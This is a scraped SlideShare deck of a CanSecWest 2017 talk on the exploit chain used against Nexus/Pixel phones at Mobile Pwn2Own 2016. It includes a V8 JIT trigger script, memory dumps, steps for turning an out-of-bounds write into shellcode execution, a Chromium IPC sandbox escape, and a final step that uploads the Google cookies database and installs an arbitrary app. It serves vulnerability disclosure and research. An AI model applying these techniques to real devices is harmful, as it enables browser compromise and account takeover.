SlideShare ist ein Scribd-Unternehmen logo
1 von 72
Downloaden Sie, um offline zu lesen
Pwning the	Nexus ™ of	Every	Pixel ™
Qidan He
Gengming Liu
CanSecWest 2017
Vancouver
#whoami
• Qidan He
• Apple/Android/Chrome	CVE	hunter	(dozens	of	credits	got)
• Speaker	at	BlackHat USA/ASIA,	DEFCON,	RECON,	CanSecWest,	HITCON
• Pwn2Own	2016/	Mobile	Pwn2Own	2016	winner
• Gengming Liu
• CTF	enthusiastic,	DEFCON	CTF	final	player
• Captain	of	AAA	CTF	team
• Mobile	Pwn2Own	2016	winner
• Too	busy	occupied	in	Pwn2Own	to	talk	L
About	Tencent Keen	Security	Lab
• Previously known as KeenTeam
• Won iOS 7 category in Mobile
Pwn2Own 2013
• Won Nexus 6p/iOS 10.1 and got
“Master of Pwn” in Mobile
Pwn2Own 2016
TL;DR:	How	we	pwned	newest	Nexus6P/Pixel	running	
Nougat
• Three	bugs	forms	a	complete	exploit	chain
• One	V8	bug	to	compromise	the	renderer
• One	IPC	bug	to	escape	sandbox
• One	bug	in	gapps	allows	app	install
• Google	response	very	quickly
• V8	and	IPC	bug	fixed	in	midnight	of	10.26	(CVE-2016-5197	and	CVE-2016-
5198)
• Gapp	update	pushed	in	10.27	(Google	VRP	credit)
• Also	affects	all	apps	using	webview/chromium
Agenda
•Introduction	and	Exploitation	of	V8	engine
•Introduction	and	Exploitation	of	sandbox	on	Android
•How	we	pwned	Nexus/Pixel	on	Mobile	Pwn2Own	
2016	with	3	bugs
• CVE-2016-5197/5198/GoogleVRP bug
History	of	classical	Chrome	exploits
• MWR	Labs,	Pwn2Own	2013
• Type-confusion	in	webkit
• Arbitrary	zero	write	in	IPC::OnContentBlocked
• Pinkie	Pie,	Mobile	Pwn2Own	2013
• Runtime_TypedArrayInitializeFromArrayLike for	renderer	code	execution
• Arbitrary	free	in	ClipboardHostMsg_WriteObjectsAsync
• Geohot in	Pwnium 4
• Property	redefinition	lead	to	OOB	read/write	in	renderer
• Spoof	IPC	Message	to	vulnerable	extension	in	privileged	domain
• Lokihart in	Pwn2Own	2015
• TOCTOU	in	GPU	process	sharedmemory
• Juri In	Pwn2Own	2015
• UAF	in	P2PSocketDispatcherHost
V8	Javascript Engine
• Widely	known	and	used
• Runtime	optimization	and	JIT	to	machine	code
• Strongtalk
• Crankshaft
• Turbofan
Object	structure	in	V8
0x2036cb90a089:	[JSArrayBuffer]
- map	=	0xebbd6702db1	[FastProperties]
- prototype	=	0x32cfe5005599
- elements	=	0x1b6415782241	<FixedArray[0]>	
[FAST_HOLEY_SMI_ELEMENTS]
- internal	fields:	2
- backing_store	=	0x5652757bea60
- byte_length	=	24929
- properties	=	{
}
- internal	fields	=	{
0
0
}
var	a	=	new	ArrayBuffer(0x6161)
0x2036cb90a089:	[JSArrayBuffer]
- map	=	0xebbd6702db1	[FastProperties]
- prototype	=	0x32cfe5005599
- elements	=	0x1b6415782241	<FixedArray[0]>	
[FAST_HOLEY_SMI_ELEMENTS]
- internal	fields:	2
- backing_store	=	0x5652757bea60
- byte_length	=	24929
- properties	=	{
}
- internal	fields	=	{
0
0
}
var	a	=	new	ArrayBuffer(0x6161)
gdb-peda$	x/30xg	0x00002036cb90a088
0x2036cb90a088:	0x00000ebbd6702db1	
0x00001b6415782241
0x2036cb90a098:	0x00001b6415782241	
0x0000616100000000
0x2036cb90a0a8:	0x00005652757bea60	
0x0000000000000004
Boxing	in	V8
• Float&Double encapsulated	in	V8	heap
• HeapNumber object
• vmovsd QWORD	PTR	[rax+0x7],xmm0
• SMI
• Tagged	pointer
Case	study:	CVE-2016-1646
• V8	Array.concat redefinition	out-of-bounds	in	Pwn2Own	2016
• Reported	by	Wen	Xu	from	KeenLab
Case	study:	CVE-2016-1646
CVE-2016-5197	– Chain	of	Bugs	#1
• Found	by	KeenLab and	used	for	Mobile	Pwn2Own	2016
• Affects	all	engines	based	on	V8	and	applications	with	Webview
How	we	exploited CVE-2016-5198
CVE-2016-5198
By	KeenLab
CVE-2016-5197
How	your	JIT	sucks
• JIT	compiles	with	type-info	in	mind
• Access	code	generated	accordingly
• What	if	object	type	changed?
• Deoptimize and	regenerate
• But… there	will	be	mistakes
• What	if	JITed access	on	globals?
function Ctor() {
n = new Set();
}
function Check() {
n.xyz = 0x826852f4;
parseInt('AAAAAAAA');
}
for(var i=0; i<2000; ++i) {
Ctor();
}
for(var i=0; i<2000; ++i) {
Check();
}
Ctor();
Check();
print("finish");
var n;
function Ctor() {
n	=	new Set();
}
function Check() {
n.xyz =	0x826852f4;
}
Ctor();
Ctor();
%OptimizeFunctionOnNextCall(Ctor);
Ctor();
Check();
Check();
%OptimizeFunctionOnNextCall(Check);
Check();
Ctor();
Check();
parseInt('AAAAAAAA')
OOB	in	Optimized	JIT	code
OOB	in	Optimized	JIT	code
Optimized	code	for	Ctor
Non-optimized	code	for	func
`Check`
Optimized
Optimized
0x3f938587243				35		48b8c1bf4a339d070000	REX.W	movq rax,0x79d334abfc1				;;	object:	
0x79d334abfc1	PropertyCell for	0x130199d54631	<a	Set	with	map	0x1ffdd430c391>
0x3f93858724d				45		488b400f							REX.W	movq rax,[rax+0xf]
Optimized
0x3f938587251				49		49ba0000805e0a4de041	REX.W	movq r10,0x41e04d0a5e800000
0x3f93858725b				59		c4c1f96ec2					vmovq xmm0,r10
0x3f938587260				64		488b4007							REX.W	movq rax,[rax+0x7]
0x3f938587264				68		488b400f							REX.W	movq rax,[rax+0xf]
0x3f938587268				72		c5fb114007					vmovsd [rax+0x7],xmm0
Heap	number
overwrite
Normally…
• Optimized	code	assumes	the	object	already	have	property
Map value
PROP_CELL_MAP
0x2ab4ce002a99
Map
Properti
es
element
s
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
mov rax,QWORD PTR [rax+0xf]
mov rax,QWORD PTR [rax+0x7]
0x41414141
mov rax,QWORD PTR [rax+0xf]
Map length:1
Non-empty FixedArray
Property
1
…
Javascript: n.xyz = 0x41414141
However…
• What	if	the	object	is	changed	and	it	doesn’t	have	property	now?
Map value
PROP_CELL_MAP
0x2ab4ce002a99
Map
Properti
es
element
s
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
Map length:0
Empty FixedArray
Map
Hashco
de
Null string
length Chars
mov rax,QWORD PTR [rax+0xf]
mov rax,QWORD PTR [rax+0x7]
0x41414141
mov rax,QWORD PTR [rax+0xf]
OUT OF BOUNDS HERE!
Map length:1
Non-empty FixedArray
Property
1
Property
Out-of-bound	to	null	string
• Overwriting	fields	of	null	string
• With	heapnumber overwrite	we	can	do	an	indirect	write
Map value
PROP_CELL_MAP
0x2ab4ce002a99
Map
Properti
es
element
s
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
Map length:0
Empty FixedArray
Map length:1
Non-empty FixedArray
Property
1
Map
Hashco
de
Null string
length
Chars
0x4141414141..
mov rax,QWORD PTR [rax+0xf]
mov rax,QWORD PTR [rax+0x7]
0x826852f4
mov rax,QWORD PTR [rax+0xf]
OUT OF BOUNDS HERE!
Map …type
Map for ONE_BYTE_INTERNALIZED_STRING_TYPE
…
vmovsd QWORD PTR [rax+0x7],xmm0
0x41e04d0a5e800000
Confused to EXTERNAL_STRING
Chars interpreted as Pointer
Property
Exploitation	Steps
• OOB	write	chars	field	of	null	string	to	leak	ArrayBuffer	address
• Overwrite	ArrayBuffer	backing_store to	leak	Function	code	address
• Overwrite	ArrayBuffer	backing_store with	Function	code	address
• Write	shellcode	to	ArrayBuffer	and	exec!
Primitives
• Write	primitive:
• HeapNumber write
• *(p	+	8)	=	v
• Read	primitive
• ArrayBuffer length	is	our	friend
• But	first	… leak	an	ArrayBuffer address	
• Use	#null	string	to	cold	start!
Structure	of	
ONE_BYTE_INTERNALIZED_STRING
pwndbg>	job	0x28b4ff7ab259
#fuck
pwndbg>	x/40xg	0x28b4ff7ab258
0x28b4ff7ab258: 0x0000090b4b182361 0x000000005887594a
0x28b4ff7ab268: 0x0000000400000000 0xdeadbeed6b637566
#null	string	as	cold	start	– Run	#1
• OOB	write	null	string	length	
• OOB	write	chars	field
• m.d =	ab	(new	ArrayBuffer)
• new	String(null)
• charCodeAt for	each	byte
• ArrayBuffer and	#null	string	address	leaked!
• Got	something	to	write	at…
• But	still,	how	to	turn	sequential	write	into	arbitrary	address	write?
#null	string	as	cold	start	– Run	#2
• Write	address	of	#null	itself	to	its	field!
• m.d =	null_str
• Perform	HeapNumber overwrite	in	next	optimization	run
• m.d =	unpackIEEE754(ab_len_ptr)
Play	with	Function	– Run	#3
• Allocate	Function	at	begining
• ab_storage_ptr =	ab_len_ptr +	8
• m.b =	unpackIEEE754(addr_of_code - 8)
• HeapNumber overwrite	*ab_storage_ptr =	code_loc – 8
• Code_ptr =	ab[3]<<	32	+	ab[2]
Play	with	Function	- Run	##
• m.b =	unpackIEEE754(code_ptr)
• *ab_storage_ptr =	code_ptr
• Write	shellcode	with	ab	access
• Call	Function
• Game	over!	J
So	renderer	code	execution	got…
• Now	what?
The	anatomy of	Chrome	sandbox
• All	untrusted	code	runs	in	Target	process
• Relay	most	operations	to	Broker
• Try	best	to	
• lock	down	the	capabilities	of	renderer
• Even	renderer	is	compromised
• Access	is	still	strictly	prohibited
• GPU	process	have	higher	level	access
• Than	normal	sandbox	process
The	new	comer:	GPU	process
Evolution	of	the	Android	Sandbox	(old	time)
Evolution	of	the	Android	Sandbox	(current	state)
Untrusted_app
Process	privileges	in	Android
Isolated_
app
media
radio
System_server
Kernel
Adb shell
State-of-art	defense	of	Android	sandbox
• DAC	introduced	by	nature	of	Linux
• IsolatedProcess introduced	in	JellyBean
• SELinux enforced	in	KitKat
• Further	restricted	in	subsequent	release
Chromium	Android	Sandbox	(cont.)
• On	Android,	Chromium	leverages	the	isolatedProcess feature	to	
implement	its	sandbox.
Chromium	Android	Sandbox(cont.)
• Isolated	process	was	introduced	around	Android	4.1
• "If	set	to	true,	this	service	will	run	under	a	special	process	
that	is	isolated	from	the	rest	of	the	system	and	has	no	
permissions	of	its	own.”
• Chromium	render	process
Chromium	Android	Sandbox(cont.)
• Inherits
• App.te
• Domain.te
• Domain_deprecated.te
Chromium	Android	Sandbox(cont.)
• Neverallow triggers	compile-time	errors	if	disobeyed
Per interface constraint
• Activity,	display,	webview_update can	be	accessed,	but
• Only interfaces without enforceNotIsolatedCaller can be invoked
Possible	ways	for	escaping	the	chrome	sandbox
•Exploiting	Chrome	IPC	(!	the	old-fashioned	way)
•Exploiting	basic	Binder	classes
• Libutils/libcutils
• Serialization
•Exploiting	Kernel
Possible	ways	for	escaping	the	chrome	sandbox
•Exploiting	Chrome	IPC	(!	the	old-fashioned	way)
•Exploiting	basic	Binder	classes
• Libutils/libcutils
• Serialization
•Exploiting	Kernel
Exploiting	binder	object	transaction/lib*utils
• CVE-2014-7911	
• Lack	of	serializable validation	in	ObjectInputStream
• Supply	native	fields	via	de-serialization
• CVE-2015-1528	
• Lack	of	transient	field	in	X509Certificate	class	definition
• CVE-2015-3875
• SharedBuffer integer	overflow
• VectorImpl::setCapacity
• Complex	objects	in	bundle	are	automatically	unboxed	when	touched
So… How	do	we	escape	the	sandbox	in	Mobile	
Pwn2Own	2016?
Chain	of	Bugs	#2
void RenderViewImpl::LaunchAndroidContentIntent(const GURL&	intent,
size_t request_id,
bool is_main_frame)	{
if (request_id !=	expected_content_intent_id_)
return;
//	Remove	the	content	highlighting	if	any.
ScheduleComposite();
if (!intent.is_empty())	{
base::RecordAction(base::UserMetricsAction(
"Android.ContentDetectorActivated"));
Send(new	ViewHostMsg_StartContentIntent(GetRoutingID(),	intent,
is_main_frame));
}
}	//	src/content/renderer/renderer_view_impl.cc
bool RenderWidgetHostViewAndroid::OnMessageReceived(
const IPC::Message&	message)	{
if (IPC_MESSAGE_ID_CLASS(message.type())	==	SyncCompositorMsgStart)	{
return SyncCompositorOnMessageReceived(message);
}
bool handled	=	true;
IPC_BEGIN_MESSAGE_MAP(RenderWidgetHostViewAndroid,	message)
IPC_MESSAGE_HANDLER(ViewHostMsg_StartContentIntent,	OnStartContentIntent)
IPC_MESSAGE_HANDLER(ViewHostMsg_SmartClipDataExtracted,
OnSmartClipDataExtracted)
IPC_MESSAGE_HANDLER(ViewHostMsg_ShowUnhandledTapUIIfNeeded,
OnShowUnhandledTapUIIfNeeded)
IPC_MESSAGE_UNHANDLED(handled	=	false)
IPC_END_MESSAGE_MAP()
return handled;
}
void RenderWidgetHostViewAndroid::OnStartContentIntent(
const GURL&	content_url,	bool	is_main_frame)	{
if (content_view_core_)	content_view_core_->StartContentIntent(content_url,	is_main_frame);
}
//...
src/content/browser/android/content_view_core_impl.cc //in	renderer	process	context
void ContentViewCoreImpl::StartContentIntent(const GURL&	content_url,
bool	is_main_frame)	{
JNIEnv*	env =	AttachCurrentThread();
ScopedJavaLocalRef<jobject>	j_obj =	java_ref_.get(env);
if (j_obj.is_null())
return;
ScopedJavaLocalRef<jstring>	jcontent_url =	ConvertUTF8ToJavaString(env,	content_url.spec());
Java_ContentViewCore_startContentIntent(env,	j_obj,	jcontent_url,	is_main_frame);
}
CVE-2016-5197
Arbitrary	intent	start	in	renderer
Webview	in	app	is	not	isolated
• Webview still	runs	in	the	same	uid/process	as	ordinary	app
• With	the	arbitrary	activity	start	ability
• Find	some	app	which	accepts	controlled-URL	to	attack!
Mobile	Pwn2Own	Chain	of	Bugs	#3
• See	that	holy	Google	Drive
• Have	full	access	to	Google	account
• Trusted	by	Google	Play	
• To	“install”	app
• Blindly	opens	any	intent-controlled	URL
• Pwn it	to	jump	from	isolated	to	untrusted
• Plus	App	installation	ability!
• Install	arbitrary	custom	app
• Got	All	permissions	
• Google	VRP	credit
Chain	it	all	together
• Use	CVE-2016-5198	to	gain	control	of	renderer	in	Chrome	browser
• Note:	chrome	currently	is	32bit
• Search	for	IPC	objects,	issue	ViewHostMsg_StartContentIntent
request
• Jump	to	Google	Drive,	open	EXP	page	again
• Note:	Google	Drive	is	a	64bit	app	so	its	webview is	also	64bit
• Got	a	shell	in	untrusted_app context	from	Google	Drive
• Reload	play.google.com,	upload	cookies.db in	app	data	directory
• Send	install	app	request,	wait	for	BOOM
DEMO
Acknowledgements
• Gengming	Liu
• Liang	Chen
• Wushi
Questions?
Key	features	of	V8
• Fast	property	access
• Dynamic	machine	code	generation

Weitere ähnliche Inhalte

Was ist angesagt?

Aggregate Sharing for User-Define Data Stream Windows
Aggregate Sharing for User-Define Data Stream WindowsAggregate Sharing for User-Define Data Stream Windows
Aggregate Sharing for User-Define Data Stream Windows
Paris Carbone
 

Was ist angesagt? (20)

Apache Flink: Better, Faster & Uncut - Piotr Nowojski, data Artisans
Apache Flink: Better, Faster & Uncut - Piotr Nowojski, data ArtisansApache Flink: Better, Faster & Uncut - Piotr Nowojski, data Artisans
Apache Flink: Better, Faster & Uncut - Piotr Nowojski, data Artisans
 
Streaming Dataflow with Apache Flink
Streaming Dataflow with Apache Flink Streaming Dataflow with Apache Flink
Streaming Dataflow with Apache Flink
 
The Internet
The InternetThe Internet
The Internet
 
Mathematics and development of fast TLS handshakes
Mathematics and development of fast TLS handshakesMathematics and development of fast TLS handshakes
Mathematics and development of fast TLS handshakes
 
Segmentation Faults, Page Faults, Processes, Threads, and Tasks
Segmentation Faults, Page Faults, Processes, Threads, and TasksSegmentation Faults, Page Faults, Processes, Threads, and Tasks
Segmentation Faults, Page Faults, Processes, Threads, and Tasks
 
eBPF Perf Tools 2019
eBPF Perf Tools 2019eBPF Perf Tools 2019
eBPF Perf Tools 2019
 
Flink Forward SF 2017: Stephan Ewen - Experiences running Flink at Very Large...
Flink Forward SF 2017: Stephan Ewen - Experiences running Flink at Very Large...Flink Forward SF 2017: Stephan Ewen - Experiences running Flink at Very Large...
Flink Forward SF 2017: Stephan Ewen - Experiences running Flink at Very Large...
 
eBPF Basics
eBPF BasicseBPF Basics
eBPF Basics
 
Pulsar connector on flink 1.14
Pulsar connector on flink 1.14Pulsar connector on flink 1.14
Pulsar connector on flink 1.14
 
Aggregate Sharing for User-Define Data Stream Windows
Aggregate Sharing for User-Define Data Stream WindowsAggregate Sharing for User-Define Data Stream Windows
Aggregate Sharing for User-Define Data Stream Windows
 
JVM Memory Model - Yoav Abrahami, Wix
JVM Memory Model - Yoav Abrahami, WixJVM Memory Model - Yoav Abrahami, Wix
JVM Memory Model - Yoav Abrahami, Wix
 
Bw tree presentation
Bw tree presentationBw tree presentation
Bw tree presentation
 
State Management in Apache Flink : Consistent Stateful Distributed Stream Pro...
State Management in Apache Flink : Consistent Stateful Distributed Stream Pro...State Management in Apache Flink : Consistent Stateful Distributed Stream Pro...
State Management in Apache Flink : Consistent Stateful Distributed Stream Pro...
 
Apache Flink Training: System Overview
Apache Flink Training: System OverviewApache Flink Training: System Overview
Apache Flink Training: System Overview
 
Performance Analysis Tools for Linux Kernel
Performance Analysis Tools for Linux KernelPerformance Analysis Tools for Linux Kernel
Performance Analysis Tools for Linux Kernel
 
Data Quality Monitoring in Realtime and at Scale
Data Quality Monitoring in Realtime and at ScaleData Quality Monitoring in Realtime and at Scale
Data Quality Monitoring in Realtime and at Scale
 
grsecurity and PaX
grsecurity and PaXgrsecurity and PaX
grsecurity and PaX
 
FastR+Apache Flink
FastR+Apache FlinkFastR+Apache Flink
FastR+Apache Flink
 
Unified Stream and Batch Processing with Apache Flink
Unified Stream and Batch Processing with Apache FlinkUnified Stream and Batch Processing with Apache Flink
Unified Stream and Batch Processing with Apache Flink
 
Storing Cassandra Metrics
Storing Cassandra MetricsStoring Cassandra Metrics
Storing Cassandra Metrics
 

Ähnlich wie CSW2017 Qidan he+Gengming liu_cansecwest2017

iBeacons - the new low-powered way of location awareness
iBeacons - the new low-powered way of location awarenessiBeacons - the new low-powered way of location awareness
iBeacons - the new low-powered way of location awareness
Stefano Zanetti
 
スマートフォン勉強会@関東 #11 どう考えてもdisconなものをiPhoneに移植してみた
スマートフォン勉強会@関東 #11 どう考えてもdisconなものをiPhoneに移植してみたスマートフォン勉強会@関東 #11 どう考えてもdisconなものをiPhoneに移植してみた
スマートフォン勉強会@関東 #11 どう考えてもdisconなものをiPhoneに移植してみた
Taro Matsuzawa
 
Code strong rob_chohan_september_2011
Code strong rob_chohan_september_2011Code strong rob_chohan_september_2011
Code strong rob_chohan_september_2011
Axway Appcelerator
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 

Ähnlich wie CSW2017 Qidan he+Gengming liu_cansecwest2017 (20)

Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
How to Root 10 Million Phones with One Exploit
How to Root 10 Million Phones with One ExploitHow to Root 10 Million Phones with One Exploit
How to Root 10 Million Phones with One Exploit
 
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
 
iBeacons - the new low-powered way of location awareness
iBeacons - the new low-powered way of location awarenessiBeacons - the new low-powered way of location awareness
iBeacons - the new low-powered way of location awareness
 
Terracotta's OffHeap Explained
Terracotta's OffHeap ExplainedTerracotta's OffHeap Explained
Terracotta's OffHeap Explained
 
スマートフォン勉強会@関東 #11 どう考えてもdisconなものをiPhoneに移植してみた
スマートフォン勉強会@関東 #11 どう考えてもdisconなものをiPhoneに移植してみたスマートフォン勉強会@関東 #11 どう考えてもdisconなものをiPhoneに移植してみた
スマートフォン勉強会@関東 #11 どう考えてもdisconなものをiPhoneに移植してみた
 
.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups
.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups
.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups
 
Rob Chohan: Titanium+Plus Modules and Javascript Bridges: Controlling Hardwar...
Rob Chohan: Titanium+Plus Modules and Javascript Bridges: Controlling Hardwar...Rob Chohan: Titanium+Plus Modules and Javascript Bridges: Controlling Hardwar...
Rob Chohan: Titanium+Plus Modules and Javascript Bridges: Controlling Hardwar...
 
Code strong rob_chohan_september_2011
Code strong rob_chohan_september_2011Code strong rob_chohan_september_2011
Code strong rob_chohan_september_2011
 
JavaFX - Next Generation Java UI
JavaFX - Next Generation Java UIJavaFX - Next Generation Java UI
JavaFX - Next Generation Java UI
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
 
LocationTech Projects
LocationTech ProjectsLocationTech Projects
LocationTech Projects
 
Hadoop 101 for bioinformaticians
Hadoop 101 for bioinformaticiansHadoop 101 for bioinformaticians
Hadoop 101 for bioinformaticians
 
XRobots
XRobotsXRobots
XRobots
 
Linux Perf Tools
Linux Perf ToolsLinux Perf Tools
Linux Perf Tools
 
DEF CON 27 - SMEA - adventures in smart buttplug penetration testing
DEF CON 27 - SMEA - adventures in smart buttplug penetration testingDEF CON 27 - SMEA - adventures in smart buttplug penetration testing
DEF CON 27 - SMEA - adventures in smart buttplug penetration testing
 
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
 
Video Terminal Evolution and The Future of Browsers
Video Terminal Evolution and The Future of BrowsersVideo Terminal Evolution and The Future of Browsers
Video Terminal Evolution and The Future of Browsers
 
LLVM Internal Architecture par Michel Guillet
LLVM Internal Architecture par Michel GuilletLLVM Internal Architecture par Michel Guillet
LLVM Internal Architecture par Michel Guillet
 
Build Custom Maps with Appcelerator Titanium, Mapbox and OpenStreetMap - tiCo...
Build Custom Maps with Appcelerator Titanium, Mapbox and OpenStreetMap - tiCo...Build Custom Maps with Appcelerator Titanium, Mapbox and OpenStreetMap - tiCo...
Build Custom Maps with Appcelerator Titanium, Mapbox and OpenStreetMap - tiCo...
 

Mehr von CanSecWest

Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
CanSecWest
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CanSecWest
 
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CanSecWest
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CanSecWest
 
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
CSW2017 Weston miller csw17_mitigating_native_remote_code_executionCSW2017 Weston miller csw17_mitigating_native_remote_code_execution
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
CanSecWest
 
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CanSecWest
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
 
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CanSecWest
 
CSW2017 Enrico branca What if encrypted communications are not as secure as w...
CSW2017 Enrico branca What if encrypted communications are not as secure as w...CSW2017 Enrico branca What if encrypted communications are not as secure as w...
CSW2017 Enrico branca What if encrypted communications are not as secure as w...
CanSecWest
 
CSW2017 Mickey+maggie low cost radio attacks on modern platforms
CSW2017 Mickey+maggie low cost radio attacks on modern platformsCSW2017 Mickey+maggie low cost radio attacks on modern platforms
CSW2017 Mickey+maggie low cost radio attacks on modern platforms
CanSecWest
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CanSecWest
 
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CanSecWest
 
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CanSecWest
 
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershellCSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CanSecWest
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
 

Mehr von CanSecWest (20)

Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
 
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
 
CSW2017 jun li_car anomaly detection
CSW2017  jun li_car anomaly detectionCSW2017  jun li_car anomaly detection
CSW2017 jun li_car anomaly detection
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
 
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
 
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
CSW2017 Weston miller csw17_mitigating_native_remote_code_executionCSW2017 Weston miller csw17_mitigating_native_remote_code_execution
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
 
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
 
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
 
CSW2017 Enrico branca What if encrypted communications are not as secure as w...
CSW2017 Enrico branca What if encrypted communications are not as secure as w...CSW2017 Enrico branca What if encrypted communications are not as secure as w...
CSW2017 Enrico branca What if encrypted communications are not as secure as w...
 
CSW2017 Mickey+maggie low cost radio attacks on modern platforms
